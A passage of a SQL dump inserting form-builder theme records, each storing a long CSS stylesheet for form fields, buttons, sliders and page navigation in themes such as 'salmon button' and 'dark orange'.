"progid:DXImageTransform.Microsoft.Alpha(Opacity=100)";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.if-ie-div-label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)" !important;\r\n	filter: alpha(opacity=100) !important;\r\n	opacity: 1 !important;\r\n}\r\n.wdform-ch-rad-label {\r\n	display: inline;\r\n	margin: -4px 5px 5px 5px;\r\n	float: left;\r\n	color: #000;\r\n	cursor: pointer\r\n}\r\ntextarea {\r\n	padding-top: 5px;\r\n}\r\n.wdform-date {\r\n  display:inline-block;\r\n	width: 105px\r\n}\r\n.wdform_footer {\r\n	margin-top: 15px;\r\n	background-color: #DFDFDF;\r\n}\r\n.page-numbers {\r\n	vertical-align: middle;\r\n}\r\n.time_box {\r\n	text-align: right;\r\n	width: 30px;\r\n	vertical-align: middle\r\n}\r\n.mini_label {\r\n	font-size: 10px;\r\n	font-family: "Lucida Grande", Tahoma, Arial, Verdana, sans-serif;\r\n	color: #A8A8A8;\r\n}\r\n.wdform-label {\r\n	border: none;\r\n	color: #000;\r\n	vertical-align: top;\r\n	line-height: 17px;\r\n}\r\n.wdform_colon {\r\n	color: #000\r\n}\r\n.wdform_separator {\r\n	font-style: bold;\r\n	vertical-align: middle;\r\n	color: #000;\r\n}\r\n.wdform_line {\r\n	color: #000\r\n}\r\n.wdform-required {\r\n	border: none;\r\n	color: red;\r\n	vertical-align: top;\r\n}\r\n.captcha_img {\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	cursor: pointer;\r\n	border-radius: 0px;\r\n}\r\n.captcha_refresh {\r\n	width: 30px;\r\n	height: 30px;\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n	cursor: pointer;\r\n	background-image: url([SITE_ROOT]/images/refresh_black.png);\r\n}\r\n.captcha_input {\r\n	height: 20px;\r\n	border-width: 1px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n}\r\n.file_upload {\r\n	border: 0px solid white;\r\n	border-radius: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	color: black;\r\n	background-color: white;\r\n}\r\n.page_deactive {\r\n	color: #fff;\r\n	background-color: #0C6177;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 20px;\r\n	text-align: center;\r\n	vertical-align: bottom;\r\n	padding-top: 5px;\r\n	padding: 5px 25px 0px 25px;\r\n	font-size: 12px;\r\n}\r\n.page_active {\r\n	color: #fff;\r\n	background-color: #2796B3;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	vertical-align: bottom;\r\n	height: 33px;\r\n	text-align: center;\r\n	font-size: 21px;\r\n	padding: 5px 20px 0px 20px;\r\n	margin-bottom: -13px;\r\n}\r\n.page_percentage_active {\r\n	padding: 0px;\r\n	margin: 0px;\r\n	border-spacing: 0px;\r\n	height: 18px;\r\n	line-height: 20px;\r\n	font-size: 15px;\r\n	float: left;\r\n	text-align: right !important;\r\n	z-index: 1;\r\n	position: relative;\r\n	background: #752D2D ; /* Old browsers */\r\n	background: -moz-linear-gradient(left, #0E6378 0%, #2C7487 39%, #2D7587 100%); /* FF3.6+ */\r\n	background: -webkit-gradient(linear, left top, right top, color-stop(0%, #0E6378 ), color-stop(39%, #2C7487 ), color-stop(100%, #2D7587 )); /* Chrome,Safari4+ */\r\n	background: -webkit-linear-gradient(left, #0E6378 0%, #2C7487 39%, #2D7587 100%); /* Chrome10+,Safari5.1+ */\r\n	background: -o-linear-gradient(left, #0E6378 0%, #2C7487 39%, #2D7587 100%); /* Opera 11.10+ */\r\n	background: -ms-linear-gradient(left, #0E6378 0%, #2C7487 39%, #2D7587 100%); /* IE10+ */\r\n	background: linear-gradient(to right, #0E6378 0%, #2C7487 39%, #2D7587 100%); /* W3C */\r\n	vertical-align: middle;\r\n}\r\n.page_percentage_deactive {\r\n	height: 18px;\r\n	line-height: 20px;\r\n	background-color: #DFDFDF;\r\n	text-align: left !important;\r\n	margin-bottom: 1px;\r\n}\r\n.page_numbers {\r\n	font-size: 14px;\r\n	color: #000;\r\n}\r\n.phone_area_code {\r\n	width: 50px;\r\n}\r\n.phone_number {\r\n	width: 100px;\r\n}\r\nbutton {\r\n	cursor: pointer;\r\n}\r\n.other_input {\r\n	border-radius: 0px;\r\n	border-width: 1px;\r\n	height: 16px;\r\n	font-size: 12px;\r\n	padding: 1px;\r\n	margin: 1px;\r\n	margin-left: 25px;\r\n	z-index: 100;\r\n	position: absolute;\r\n}\r\n.wdform_page_navigation {\r\n	text-align: center!important;\r\n	margin-bottom: 0px;\r\n}\r\n.wdform_percentage_text {\r\n	margin: 3px -34px 3px 9px;\r\n	color: #FFFFFF;\r\n	font-weight: normal;\r\n	font-size: 12px;\r\nline-height:18px;\r\n}\r\n.wdform_percentage_title {\r\n	color: #000000;\r\n	font-style: italic;\r\n	margin: 0px 0px 0px 40px;\r\n	display: inline-block;\r\n	line-height: 20px;\r\n	height: 20px;\r\n	vertical-align: middle;\r\n}\r\n.wdform_percentage_arrow {\r\n	display: inline-block;\r\n	width: 34px;\r\n	height: 18px;\r\n	background: url([SITE_ROOT]/images/03/03/percentage_arrow.png);\r\n	position: relative;\r\n	left: -1px;\r\ntop:0px;\r\n	z-index: 0;\r\n	vertical-align: middle;\r\n}\r\n.wdform_button button {\r\n	background: #4D792C;\r\n	cursor: pointer;\r\n	font-size: 17px;\r\n	border-radius: 0px;\r\n	min-width: 80px;\r\n	min-height: 31px;\r\n	color: #fff;\r\n	border: 2px solid #68943B;\r\n	margin: 5px;\r\n	box-shadow: 0px 0px 2px #c9c9c9;\r\n	font-family: Segoe UI;\r\n}', 0),
(12, 'Theme 03 transparent (salmon button)', '.radio-div input[type="radio"],\r\n.checkbox-div input[type="checkbox"]\r\n{\r\nvisibility: hidden;\r\n}\r\n.wdform-page-and-images .other_input\r\n{\r\nmax-width: none;\r\n}\r\nbutton,\r\ninput,\r\nselect,\r\ntextarea\r\n{\r\nfont-size:14px;\r\n}\r\n.warning,\r\n.error\r\n{\r\nbackground-color: #D8D6D7;\r\nborder: 1px solid #D8D6D7;\r\nmargin-bottom: 10px;\r\ncolor: #D8D6D7;\r\npadding: 5px;\r\n}\r\n.warning *,\r\n.error *\r\n{\r\nmargin:0;\r\n}\r\n.recaptcha_input_area input\r\n{\r\nheight:initial !important;\r\n}\r\na.ui-slider-handle {\r\n	border-radius: 0px;\r\n	border: 1px solid #39680B;\r\n	background: #C9FD9C;\r\n	height: 13px;\r\n	width: 13px;\r\n}\r\n.ui-slider-horizontal .ui-slider-handle {\r\n	top: -5px !important;\r\n}\r\n.ui-slider {\r\n	height: 6px;\r\n	background: #fff !important;\r\n	margin: 7px 0px;\r\n}\r\n.wdform_grading input {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell input[type="text"] {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell select {\r\n	width: 60px;\r\n}\r\n.wdform_section .wdform_column:last-child {\r\n	padding-right: 0px !important;\r\n}\r\n.wdform_preload {\r\n	display: none;\r\n}\r\n.wdform_grading {\r\n	padding: 3px 0px;\r\n}\r\n.wdform-matrix-table {\r\n	display: table;\r\n	border-spacing: 0px;\r\n}\r\n.wdform-matrix-column {\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-matrix-cell {\r\n	text-align: center;\r\n	display: table-cell;\r\n	padding: 6px 10px;\r\n}\r\n.wdform-matrix-head>div {\r\n	display: table-cell;\r\n	text-align: center;\r\n}\r\n.wdform-matrix-head {\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row0 {\r\n	background: #DFDFDF;\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row1 {\r\n	background: #E9E9E9;\r\n	display: table-row;\r\n}\r\n.selected-text {\r\n	text-align: left;\r\n}\r\n.wdform-quantity {\r\n	width: 30px;\r\n	margin: 2px 0px;\r\n}\r\n.wdform_scale_rating label {\r\n	vertical-align: middle;\r\n}\r\n.ui-corner-all {\r\n	border-radius: 0px;\r\n}\r\n.ui-widget-content {\r\n	border: 0px;\r\n	background: transparent;\r\n}\r\na.ui-spinner-button:hover {\r\n	background: #FA8072 !important;\r\n	color: #fff;\r\n}\r\na.ui-spinner-button:active {\r\n	background: #FA8072 !important;\r\n	color: #fff;\r\n}\r\na.ui-spinner-button:focus {\r\n	background: #FA8072 !important;\r\n	color: #fff;\r\n}\r\na.ui-slider-handle:hover {\r\n	background: #FA8072 !important;\r\n	color: #fff;\r\n}\r\na.ui-slider-handle:active {\r\n	background: #FA8072 !important;\r\n	color: #fff;\r\n}\r\na.ui-slider-handle:focus {\r\n	background: #FA8072 !important;\r\n	color: #fff;\r\n}\r\nui-state-hover {\r\n	background: #FA8072 !important;\r\n	color: #fff;\r\n}\r\n.ui-state-default {\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-widget-content .ui-state-default {\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-widget-header .ui-state-default {\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-slider-range {\r\n	background: #C9FD9C !important;\r\n}\r\n.wdform_map {\r\n	border: 6px solid #fff;\r\n}\r\n.wdform-page-and-images {\r\n	width: 100%;\r\n	border: 0px !important;\r\n}\r\n.paypal-property {\r\n	display: inline-block;\r\n	margin-right: 15px;\r\n	vertical-align: middle;\r\n}\r\n.sel-wrap {\r\n	display: inline-block;\r\n	vertical-align: middle;\r\n	width:100%;\r\n}\r\n.sel-wrap select {\r\n	position: absolute;\r\n z-index:-1;\r\n width: 0px !important;\r\n}\r\n.sel-imul {\r\n	display: inline-block;\r\n}\r\n.sel-imul .sel-selected {\r\n	cursor: pointer;\r\n	position: relative;\r\n	display: inline-block;\r\n	border-radius: 0px;\r\n	padding: 0px 0px 0px 2px;\r\n	font-size: 13px;\r\n	height: 23px;\r\n	line-height: 23px;\r\n	overflow: hidden;\r\n	background: #fff;\r\n	border: 0px solid #ccc;\r\n	background-position: right 2px center;\r\n	width: 100%;\r\n}\r\n.sel-imul.act .sel-selected {\r\n	background: #fff;\r\n}\r\n.sel-selected .sel-arraw {\r\n	height: 23px;\r\n	width: 30px;\r\n	background: url([SITE_ROOT]/images/03/01/01.png) 50% 50% no-repeat;\r\n	position: absolute;\r\n	top: 0px;\r\n	right: 0px;\r\n	padding: 0px;\r\n}\r\n.sel-imul:hover .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul.act .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul .sel-options {\r\n	background: #fff;\r\n	border: 1px solid #dbdbdb;\r\n	border-top: none;\r\n	position: absolute;\r\n	width: inherit;\r\n	display: none;\r\n	z-index: 10;\r\n	max-height: 200px;\r\n	overflow-y: auto;\r\n	overflow-x: hidden;\r\n}\r\n.sel-options .sel-option {\r\n	padding: 3px 4px;\r\n	font-size: 13px;\r\n	border: 1px solid #fff;\r\n	border-right: none;\r\n	border-left: none;\r\n	text-align: left;\r\n}\r\n.sel-options .sel-option:hover {\r\n	border-color: #dbdbdb;\r\n	cursor: pointer;\r\n}\r\n.sel-options .sel-option.sel-ed {\r\n	background: #dbdbdb;\r\n	border-color: #dbdbdb;\r\n}\r\ninput[type=text]{\r\n	margin: 0px;\r\n}\r\ninput[type=password]{\r\n	margin: 0px;\r\n}\r\ninput[type=url]{\r\n	margin: 0px;\r\n}\r\ninput[type=email]{\r\n	margin: 0px;\r\n}\r\ninput.text{\r\n	margin: 0px;\r\n}\r\ninput.title{\r\n	margin: 0px;\r\n}\r\ntextarea{\r\n	margin: 0px;\r\n}\r\nselect {\r\n	margin: 0px;\r\n}\r\n.form-error {\r\n	border-color: red !important;\r\n}\r\n.form-error:focus {\r\n	border-color: red !important;\r\n}\r\n.wdform-field {\r\n	display: table-cell;\r\n	padding: 5px 0px;\r\n}\r\n.wdform-label-section{\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-element-section {\r\n	text-align: left;\r\n	display: table-cell;\r\n	min-width: 140px;\r\n}\r\n.file-upload input {\r\n	position: absolute;\r\n	visibility: hidden;\r\n}\r\n.file-upload-status {\r\n	margin-left: 10px;\r\n	max-width: 200px;\r\n	font-weight: bold;\r\n	font-size: 16px;\r\n	color: #888;\r\n	position: absolute;\r\n	border-radius: 0px;\r\n	height: 23px;\r\n	padding-left: 5px;\r\n	padding-right: 5px;\r\n	white-space: nowrap;\r\n	overflow: hidden;\r\n	}\r\n.file-picker {\r\n	width: 32px;\r\n	height: 25px;\r\n	background: url([SITE_ROOT]/images/03/upload.png);\r\n	display: inline-block;\r\n}\r\ndiv.wdform-page-button {\r\n	color: #414141;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 36px;\r\n	line-height: 36px;\r\n	background-color: #ACABAB;\r\npadding: 2px 15px;\r\nvertical-align: middle;\r\nborder: none;\r\nfont-size: 15px;\r\n}\r\n\r\n\r\n.button-submit {\r\nbackground: #FA8072;\r\ncursor: pointer;\r\nfont-size: 17px;\r\nmin-width: 80px;\r\nmin-height: 34px;\r\ncolor: #fff;\r\nborder: 2px solid #FFABA1;\r\nmargin: 5px;\r\nbox-shadow: 0px 0px 1px 1px #FF9689;\r\nfont-family: Segoe UI;\r\n	}\r\n.button-reset {\r\n	background: #D8D6D7;\r\n	cursor: pointer;\r\n	font-size: 17px;\r\n	min-width: 80px;\r\n	min-height: 34px;\r\n	color: #787878;\r\n	border: 2px solid #fff;\r\n	margin: 5px;\r\n	box-shadow: 0px 0px 2px 1px #969495;\r\n	font-family: Segoe UI;\r\n}\r\n.wdform_page {\r\n	background: transparent;\r\n	padding-top: 15px;\r\n	border-radius: 0px;\r\n	font-family: Segoe UI;\r\n}\r\n.wdform_column {\r\n	padding-right: 30px !important;\r\n	float: left;\r\n	border-spacing: 2px;\r\n	border-collapse: separate !important;\r\n}\r\n.wdform-field-section-break {\r\n	text-align: center;\r\n}\r\n.wdform_section_break2 {\r\n	margin: 16px 10px 16px 0px;\r\n	display: inline-block;\r\n	background: url([SITE_ROOT]/images/03/01/bg.png);\r\n	text-align: left;\r\n	padding: 10px 20px 10px 50px;\r\n	border-radius: 0px;\r\n	-moz-box-shadow: 7px -9px 20px -5px rgba(0, 0, 0, 0.23), -7px 9px 20px -5px rgba(0, 0, 0, 0.23);\r\n	-webkit-box-shadow: 7px -9px 20px -5px rgba(0, 0, 0, 0.23), -7px 9px 20px -5px rgba(0, 0, 0, 0.23);\r\n	box-shadow: 7px -9px 20px -5px rgba(0, 0, 0, 0.23), -7px 9px 20px -5px rgba(0, 0, 0, 0.23);\r\n	width: 466px;\r\n	text-align: right;\r\n	color: #000;\r\nfont-size: 18px;\r\n}\r\n\r\n.wdform_section_break\r\n{\r\nmargin: 16px 15px;\r\ntext-align: left;\r\nfont-size: 18px;\r\ncolor: #555;\r\n}\r\n.wdform_section {\r\n	display: inline-block;\r\n	padding: 0px 15px;\r\n}\r\nselect {\r\n	border-radius: 0px;\r\n	padding: 2px;\r\n	height: 26px;\r\n	overflow: hidden;\r\n	border: 0px solid #ccc;\r\n	padding: 2px;\r\n	outline: none;\r\nbackground: #ECECEC;\r\n}\r\ninput[type="text"]{\r\n	border-radius: 0px;\r\n	height: 25px;\r\n	border: 0px solid #ccc;\r\n	padding:0 3px !important;\r\nbackground: #ECECEC;\r\n}\r\ninput[type="password"]{\r\n	border-radius: 0px;\r\n	height: 25px;\r\n	border: 0px solid #ccc;\r\n	padding:0 3px !important;\r\nbackground: #ECECEC;\r\n}\r\ntextarea {\r\n	border-radius: 0px;\r\n	height: 25px;\r\n	border: 0px solid #ccc;\r\n	padding:0 3px !important;\r\nbackground: #ECECEC;\r\n}\r\ninput[type="text"]:focus{\r\n	border-color: #FFB471;\r\n	outline: none;\r\n}\r\ninput[type="password"]:focus{\r\n	border-color: #FFB471;\r\n	outline: none;\r\n}\r\ntextarea:focus{\r\n	border-color: #FFB471;\r\n	outline: none;\r\n}\r\n\r\n.input_deactive {\r\n	color: #999999;\r\n	font-style: italic;\r\n}\r\n.input_active {\r\n	color: #000000;\r\n	font-style: normal;\r\n}\r\n.am_pm_select {\r\n	width: 30px;\r\n	vertical-align: middle;\r\n}\r\n.checkbox-div input[type=checkbox] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.checkbox-div {\r\n	width: 13px;\r\n	height: 12px;\r\n	background: transparent;\r\n	border: 1px solid #A7A7A7;\r\n	border-radius: 0px;\r\n	position: relative;\r\n	display: inline-block;\r\n}\r\n.checkbox-div label {\r\n	cursor: pointer;\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=0)";\r\n	filter: alpha(opacity=0);\r\n	opacity: 0;\r\n	content: "";\r\n	position: absolute;\r\n	width: 16px;\r\n	height: 13px;\r\n	background: url([SITE_ROOT]/images/03/checkbox.png);\r\n	border-radius: 0px;\r\n	top: -3px;\r\n	left: 1px;\r\n}\r\n.checkbox-div label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .checkbox-div label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div input[type=checkbox]:checked + label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.wdform-calendar-button,\r\n.wdform-calendar-button:hover {\r\n  display:inline-block;\r\n	background: transparent url([SITE_ROOT]/images/03/date.png) no-repeat left 50% !important;\r\n	border: 0px;\r\n	color: transparent;\r\n	width: 22px;\r\n	height: 24px;\r\n	position: relative;\r\n	left: -22px;\r\n	vertical-align: top;\r\n}\r\n.wdform-calendar-button:focus {\r\n outline:none; \r\n}\r\n.radio-div input[type=radio] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.forlabs {\r\n	float: right;\r\n	margin-right: 20px;\r\n}\r\n.radio-div {\r\n	width: 13px;\r\n	height: 12px;\r\n	background: transparent;\r\n	border: 1px solid #A7A7A7;\r\n	border-radius: 0px;\r\n	position: relative;\r\n	display: inline-block;\r\n	top: 2px;\r\n}\r\n.radio-div label {\r\n	cursor: pointer;\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=0)";\r\n	filter: alpha(opacity=0);\r\n	opacity: 0;\r\n	content: "";\r\n	position: absolute;\r\n	width: 9px;\r\n	height: 8px;\r\n	background: #A7A7A7;\r\n	border-radius: 0px;\r\n	top: 2px;\r\n	left: 2px;\r\n}\r\n.radio-div label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .radio-div label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div input[type=radio]:checked + label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.if-ie-div-label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)" !important;\r\n	filter: alpha(opacity=100) !important;\r\n	opacity: 1 !important;\r\n}\r\n.wdform-ch-rad-label {\r\n	display: inline;\r\n	margin: -4px 5px 5px 5px;\r\n	float: left;\r\n	color: #000;\r\n	cursor: pointer\r\n}\r\ntextarea {\r\n	padding-top: 5px;\r\n}\r\n.wdform-date {\r\n  display:inline-block;\r\n	width: 105px\r\n}\r\n.wdform_footer {\r\n	margin-top: 15px;\r\n	background-color: #DFDFDF;\r\n}\r\n.page-numbers {\r\n	vertical-align: middle;\r\n}\r\n.time_box {\r\n	text-align: right;\r\n	width: 30px;\r\n	vertical-align: middle\r\n}\r\n.mini_label {\r\n	font-size: 10px;\r\n	font-family: "Lucida Grande", Tahoma, Arial, Verdana, sans-serif;\r\n	color: #A8A8A8;\r\n}\r\n.wdform-label {\r\n	border: none;\r\n	color: #000;\r\n	vertical-align: top;\r\n	line-height: 17px;\r\n}\r\n.wdform_colon {\r\n	color: #000\r\n}\r\n.wdform_separator {\r\n	font-style: bold;\r\n	vertical-align: middle;\r\n	color: #000;\r\n}\r\n.wdform_line {\r\n	color: #000\r\n}\r\n.wdform-required {\r\n	border: none;\r\n	color: red;\r\n	vertical-align: top;\r\n}\r\n.captcha_img {\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	cursor: pointer;\r\n	border-radius: 0px;\r\n}\r\n.captcha_refresh {\r\n	width: 30px;\r\n	height: 30px;\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n	cursor: pointer;\r\n	background-image: url([SITE_ROOT]/images/refresh_black.png);\r\n}\r\n.captcha_input {\r\n	height: 20px;\r\n	border-width: 1px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n}\r\n.file_upload {\r\n	border: 0px solid white;\r\n	border-radius: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	color: black;\r\n	background-color: white;\r\n}\r\n.page_deactive {\r\n	color: #fff;\r\n	background-color: #FF9A8E;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 20px;\r\n	text-align: center;\r\n	vertical-align: bottom;\r\n	padding-top: 5px;\r\n	padding: 5px 25px 0px 25px;\r\n	font-size: 12px;\r\n}\r\n.page_active {\r\n	color: #fff;\r\n	background-color: #FA8072;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	vertical-align: bottom;\r\n	height: 33px;\r\n	text-align: center;\r\n	font-size: 21px;\r\n	padding: 5px 20px 0px 20px;\r\n	margin-bottom: -13px;\r\n}\r\n.page_percentage_active {\r\n	padding: 0px;\r\n	margin: 0px;\r\n	border-spacing: 0px;\r\n	height: 18px;\r\n	line-height: 20px;\r\n	font-size: 15px;\r\n	float: left;\r\n	text-align: right !important;\r\n	z-index: 1;\r\n	position: relative;\r\n	background: #FF8F83; /* Old browsers */\r\n	background: -moz-linear-gradient(left, #F7B4AC 0%, #F89F95 39%, #FF8F83 100%); /* FF3.6+ */\r\n	background: -webkit-gradient(linear, left top, right top, color-stop(0%, #F7B4AC), color-stop(39%, #F89F95), color-stop(100%, #FF8F83)); /* Chrome,Safari4+ */\r\n	background: -webkit-linear-gradient(left, #F7B4AC 0%, #F89F95 39%, #FF8F83 100%); /* Chrome10+,Safari5.1+ */\r\n	background: -o-linear-gradient(left, #F7B4AC 0%, #F89F95 39%, #FF8F83 100%); /* Opera 11.10+ */\r\n	background: -ms-linear-gradient(left, #F7B4AC 0%, #F89F95 39%, #FF8F83 100%); /* IE10+ */\r\n	background: linear-gradient(to right, #F7B4AC 0%, #F89F95 39%, #FF8F83 100%); /* W3C */\r\n	vertical-align: middle;\r\n}\r\n.page_percentage_deactive {\r\n	height: 18px;\r\n	line-height: 20px;\r\n	background-color: #DFDFDF;\r\n	text-align: left !important;\r\n	margin-bottom: 1px;\r\n}\r\n.page_numbers {\r\n	font-size: 14px;\r\n	color: #000;\r\n}\r\n.phone_area_code {\r\n	width: 50px;\r\n}\r\n.phone_number {\r\n	width: 100px;\r\n}\r\nbutton {\r\n	cursor: pointer;\r\n}\r\n.other_input {\r\n	border-radius: 0px;\r\n	border-width: 1px;\r\n	height: 16px;\r\n	font-size: 12px;\r\n	padding: 1px;\r\n	margin: 1px;\r\n	margin-left: 25px;\r\n	z-index: 100;\r\n	position: absolute;\r\n}\r\n.wdform_page_navigation {\r\n	text-align: center!important;\r\n	margin-bottom: 0px;\r\n}\r\n.wdform_percentage_text {\r\n	margin: 3px -34px 3px 9px;\r\n	color: #FFFFFF;\r\n	font-weight: normal;\r\n	font-size: 12px;\r\nline-height: 18px;\r\n}\r\n.wdform_percentage_title {\r\n	color: #000000;\r\n	font-style: italic;\r\n	margin: 0px 0px 0px 40px;\r\n	display: inline-block;\r\n	line-height: 20px;\r\n	height: 20px;\r\n	vertical-align: middle;\r\n}\r\n.wdform_percentage_arrow {\r\n	display: inline-block;\r\n	width: 34px;\r\n	height: 18px;\r\n	background: url([SITE_ROOT]/images/03/04/percentage_arrow.png);\r\n	position: relative;\r\n	left: -1px;\r\ntop:0px;\r\n	z-index: 0;\r\n	vertical-align: middle;\r\n}\r\n.wdform_button button {\r\n	background: #4D792C;\r\n	cursor: pointer;\r\n	font-size: 17px;\r\n	border-radius: 0px;\r\n	min-width: 80px;\r\n	min-height: 31px;\r\n	color: #fff;\r\n	border: 2px solid #68943B;\r\n	margin: 5px;\r\n	box-shadow: 0px 0px 2px #c9c9c9;\r\n	font-family: Segoe UI;\r\n}', 0);
INSERT INTO `cyb_formmaker_themes` (`id`, `title`, `css`, `default`) VALUES
(13, 'Theme 04 dark orange', '.wdform-page-and-images .other_input\r\n{\r\nmax-width: none;\r\n}\r\nbutton,\r\ninput,\r\nselect,\r\ntextarea\r\n{\r\nfont-size:14px;\r\n}\r\n.warning,\r\n.error\r\n{\r\nbackground-color: #F0EFEF;\r\nborder: 1px solid #F6CE9D;\r\nmargin-bottom: 10px;\r\ncolor: #F6CE9D;\r\npadding: 5px;\r\n}\r\n.warning *,\r\n.error *\r\n{\r\nmargin:0;\r\n}\r\n.recaptcha_input_area input\r\n{\r\nheight:initial !important;\r\n}\r\na.ui-slider-handle {\r\n	width: 15px;\r\n	height: 15px;\r\n	top: -5px;\r\n}\r\n.ui-slider {\r\n	height: 6px;\r\n	background: #fff !important;\r\n	margin: 7px 0px;\r\n}\r\n.wdform_grading input {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell input[type="text"] {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell select {\r\n	width: 60px;\r\n}\r\n.wdform_section .wdform_column:last-child {\r\n	padding-right: 0px !important;\r\n}\r\n.wdform_preload {\r\n	display: none;\r\n}\r\n@font-face {\r\n	font-family: ArTarumianHandes;\r\n	src: url([SITE_ROOT]/css/HANDES.ttf);\r\n}\r\n.wdform_grading {\r\n	padding: 3px 0px;\r\n}\r\n.wdform-matrix-table {\r\n	display: table;\r\n	border-spacing: 0px;\r\n}\r\n.wdform-matrix-column {\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-matrix-cell {\r\n	text-align: center;\r\n	display: table-cell;\r\n	padding: 6px 10px;\r\n}\r\n.wdform-matrix-head>div {\r\n	display: table-cell;\r\n	text-align: center;\r\n}\r\n.wdform-matrix-head {\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row0 {\r\n	background: #DFDFDF;\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row1 {\r\n	background: #EDE5DA;\r\n	display: table-row;\r\n}\r\n.selected-text {\r\n	text-align: left;\r\n}\r\n.wdform-quantity {\r\n	width: 30px;\r\n	margin: 2px 0px;\r\n}\r\n.wdform_scale_rating label {\r\n	vertical-align: middle;\r\n}\r\n.ui-corner-all {\r\n	border-radius: 3px;\r\n}\r\n.ui-widget-content {\r\n	border: 0px;\r\n	background: transparent;\r\n}\r\na.ui-spinner-button:hover{\r\n	background: #E2B983 !important;\r\n	color: #fff;\r\n}\r\na.ui-spinner-button:active{\r\n	background: #E2B983 !important;\r\n	color: #fff;\r\n}\r\na.ui-spinner-button:focus{\r\n	background: #E2B983 !important;\r\n	color: #fff;\r\n}\r\na.ui-slider-handle:hover{\r\n	background: #E2B983 !important;\r\n	color: #fff;\r\n}\r\na.ui-slider-handle:active{\r\n	background: #E2B983 !important;\r\n	color: #fff;\r\n}\r\na.ui-slider-handle:focus{\r\n	background: #E2B983 !important;\r\n	color: #fff;\r\n}\r\nui-state-hover {\r\n	background: #E2B983 !important;\r\n	color: #fff;\r\n}\r\n.ui-state-default{\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-widget-content .ui-state-default{\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-widget-header .ui-state-default {\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-slider-range {\r\n	background: #E5E5E5 !important;\r\n}\r\n.wdform_map {\r\n	border: 6px solid #DCDCDC;\r\n}\r\n.wdform-page-and-images {\r\n	width: 100%;\r\n	border: 0px !important;\r\n}\r\n.paypal-property {\r\n	display: inline-block;\r\n	margin-right: 15px;\r\n	vertical-align: middle;\r\n}\r\n.sel-wrap {\r\n	display: inline-block;\r\n	vertical-align: middle;\r\n	width:100%;\r\n}\r\n.sel-wrap select 